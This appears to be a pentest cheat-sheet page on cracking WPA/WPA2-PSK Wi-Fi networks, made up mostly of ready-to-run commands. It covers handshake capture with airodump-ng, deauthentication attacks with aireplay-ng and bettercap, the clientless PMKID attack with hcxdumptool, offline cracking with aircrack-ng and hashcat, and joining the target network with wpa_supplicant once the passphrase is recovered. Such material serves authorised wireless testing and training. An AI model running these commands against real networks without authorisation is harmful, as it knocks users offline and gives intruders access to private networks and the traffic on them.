black electronics

WPA/WPA2-PSK

Attacking WPA/WPA2-PSK

Attacking WPA/WPA2-PSK

WPA/WPA2 Personal (Pre-Shared Key) networks can be attacked by capturing the 4-way handshake or a PMKID and cracking it offline. This section covers handshake capture, deauthentication, the clientless PMKID attack, cracking with Aircrack-ng and Hashcat, and connecting back to the network.

Capturing the 4-Way Handshake

Put the adapter in monitor mode (see Setup and Discovery), identify the target AP and channel, then capture the handshake, deauthenticating a client if needed to force a reconnection.

Terminal window
# Target the network on its channel and write a capture
sudo airodump-ng -c <channel> --bssid AA:BB:CC:DD:EE:FF -w PSK wlan0mon

Deauthentication to Force a Handshake

Terminal window
# Deauthenticate clients so they reconnect and reveal the handshake
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Old-school 4-way handshake capture / deauth reference
airodump-ng -c 3 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

PMKID Attack (Clientless)

The PMKID attack recovers crackable material directly from the AP without waiting for a client handshake, and is often the preferred first approach.

hcxdumptool

Terminal window
# Test the card for at least two minutes (look for HIT values)
sudo hcxdumptool -i wlan0 --do_rcascan
# Build a list of target APs to attack
echo 'AA:BB:CC:DD:EE:FF' | tr -d ':' >> bssid.lst
# Launch the attack (filtered to the target list)
sudo hcxdumptool -i wlan0 -o ~/work/capture.pcapng --filterlist_ap=bssid.lst --filtermode=2 --enable_status=1
sudo hcxdumptool -i wlan0 -o ~/work/capture.pcapng --enable_status=1
# Set a specific channel
sudo hcxdumptool -i wlan0 --enable_status=1 -c 6 --filterlist=bssid.lst --filtermode=2 -o ~/work/capture.pcapng

Bettercap PMKID

Terminal window
# Put the card in monitor mode, then associate to capture a PMKID
sudo bettercap -iface wlan0
wifi.recon on
set wifi.show.sort clients desc
set ticker.commands 'clear; wifi.show'
set ticker.period 5
ticker on
# Move to the target channel and associate / deauth
wifi.recon.channel 1
wifi.assoc all
wifi.assoc AA:BB:CC:DD:EE:FF
wifi.deauth AA:BB:CC:DD:EE:FF

Cracking Captured Material

The current Hashcat workflow uses mode 22000 (the unified hc22000 format produced by cap2hashcat). Aircrack-ng can crack the .cap directly. Ensure the SSID is present in the wordlist context for PMKID/handshake cracking.

Aircrack-ng

Terminal window
sudo aircrack-ng -a 2 -w <wordlist> capture.cap
aircrack-ng -w /usr/share/wordlists/wifite.txt -e CorpWiFi -b AA:BB:CC:DD:EE:FF capture-04.cap

Hashcat (current: mode 22000)

Terminal window
# Convert a capture to the hc22000 format
# https://hashcat.net/cap2hashcat/
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt

Legacy Hashcat Modes and Conversions

The 2500 (hccapx handshake) and 16800 (PMKID) modes below, and the cap2hccapx / hcxpcaptool conversions, have been superseded by mode 22000 and cap2hashcat above. They are retained for older captures and workflows.

Terminal window
# Legacy: convert to hccapx (superseded by cap2hashcat)
# https://hashcat.net/cap2hccapx/
# Legacy: handshake cracking (mode 2500)
hashcat -m 2500 -a 3 -w 3 capture.hccapx '?d?d?d?d?d?d?d?d'
hashcat -m 2500 C:\path\to\hash.txt C:\path\to\wordlists
# Legacy: PMKID conversion with hcxpcaptool
sudo hcxpcaptool -z hash.txt ~/work/capture.pcapng
sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z hashcat.16800 ~/work/capture.pcapng
# Legacy: PMKID cracking (mode 16800)
hashcat -m 16800 hash.txt /usr/share/wordlists/rockyou.txt -r ~/tools/rules/d3adhob0.rule

Distributed Cracking (wpa-sec)

Terminal window
# Submit captures to the distributed wpa-sec cracking service
# https://wpa-sec.stanev.org/?my_nets
# Configure your account key where required: <WPA_SEC_API_KEY>

Connecting to the Network

Once the PSK is recovered, connect back to confirm access.

Terminal window
# Create a configuration file
nano wireless.conf
network={
ssid="CorpWiFi"
key_mgmt=WPA-PSK
psk="<passphrase>"
proto=RSN
}
# Connect to the AP
sudo wpa_supplicant -i wlan0 -c wireless.conf
sudo wpa_supplicant -D nl80211 -i wlan0 -c wireless.conf
# Obtain an IP address
sudo dhclient wlan0 -v
Useful LinksPentest PayloadsCheat Sheets